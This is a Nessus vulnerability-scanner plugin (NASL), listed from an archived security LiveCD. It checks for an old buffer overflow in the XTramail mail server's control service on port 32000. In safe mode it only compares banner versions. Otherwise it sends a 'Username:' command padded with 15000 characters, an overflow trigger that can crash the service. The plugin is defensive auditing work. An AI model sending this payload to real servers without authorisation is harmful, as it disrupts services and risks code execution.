home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / xtramail_control.nasl < prev    next >
Text File  |  2005-01-14  |  3KB  |  129 lines

  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6.  
  7. if(description)
  8. {
  9.  script_id(10323);
  10.  script_bugtraq_id(791);
  11.  script_version ("$Revision: 1.18 $");
  12.  script_cve_id("CAN-1999-1511");
  13.  
  14.  name["english"] = "XTramail control denial";
  15.  name["francais"] = "DΘni de service control contre le MTA Xtramail";
  16.  script_name(english:name["english"], francais:name["francais"]);
  17.  
  18.  desc["english"] = "There is a buffer overflow
  19. in the remote service when it is issued the 
  20. following command :
  21.  
  22.     Username: (buffer)
  23.     
  24. Where 'buffer' is 15000 chars.
  25.  
  26. This problem may allow an attacker to
  27. execute arbitrary code on this computer.
  28.  
  29. Solution : contact your vendor for a
  30. patch.
  31.  
  32. Risk factor : High";
  33.  
  34.  
  35.  desc["francais"] = "Il y a un dΘpassement
  36. de buffer lorsque ce service recoit la commande :
  37.  
  38.  
  39.     Username: (buffer)
  40.     
  41. O∙ buffer fait 15000 caractΦres.
  42.  
  43. Ce problΦme peut permettre α un pirate
  44. d'executer du code arbitraire sur
  45. votre machine.
  46.  
  47.  
  48. Solution : contactez votre vendeur pour
  49. un patch.
  50.  
  51. Facteur de risque : ElevΘ";
  52.  
  53.  
  54.  script_description(english:desc["english"], francais:desc["francais"]);
  55.  
  56.  summary["english"] = "Overflows the remote server";
  57.  summary["francais"] = "Overflow le serveur distant";
  58.  script_summary(english:summary["english"], francais:summary["francais"]);
  59.  
  60.  script_category(ACT_MIXED_ATTACK); # mixed
  61.  
  62.  
  63.  script_copyright(english:"This script is Copyright (C) 1999 Renaud Deraison",
  64.         francais:"Ce script est Copyright (C) 1999 Renaud Deraison");
  65.  family["english"] = "Misc.";
  66.  family["francais"] = "Divers";
  67.  script_family(english:family["english"], francais:family["francais"]);
  68.  script_dependencie("find_service.nes", "sendmail_expn.nasl");
  69.  script_require_ports(32000);
  70.  exit(0);
  71. }
  72.  
  73. #
  74. # The script code starts here
  75. #
  76.  
  77. port = 32000;
  78.  
  79. if(safe_checks())
  80. {
  81.  if(!get_port_state(port))exit(0);
  82.  soc = open_sock_tcp(port);
  83.  if(!soc)exit(0);
  84.  banner = recv_line(socket:soc, length:4096);
  85.  close(soc);
  86.  if(banner)
  87.  {
  88.   b = tolower(banner);
  89.   if("xtramail" >< b)
  90.   {
  91.   if( ereg(pattern:".*1\.([0-9]|1[0-1])[^0-9].*",
  92.        string:b)
  93.     )
  94.     {
  95.      data = "
  96. The remote server is Xtramail 1.11 or older.
  97. This version is known for being vulnerable to a buffer
  98. overflow in the 'Username:' command.
  99.     
  100. This *may* allow an attacker to execute arbitrary commands
  101. as root on the remote server.
  102.  
  103. *** Nessus reports this vulnerability using only
  104. *** information that was gathered. Use caution
  105. *** when testing without safe checks enabled.
  106.  
  107. Solution : upgrade 
  108. Risk factor : High";
  109.      security_hole(port:port, data:data);
  110.     }
  111.   }
  112.  }
  113.  exit(0);
  114. }
  115. if(get_port_state(port))
  116. {
  117.  soc = open_sock_tcp(port);
  118.  if(soc)
  119.  {
  120.   s = recv_line(socket:soc, length:1024);
  121.   if ( ! s ) exit(0);
  122.   c = string("Username: ", crap(15000), "\r\n");
  123.   send(socket:soc, data:c);
  124.   s = recv_line(socket:soc, length:1024);
  125.   if(!s)security_hole(port);
  126.   close(soc);
  127.  }
  128. }
  129.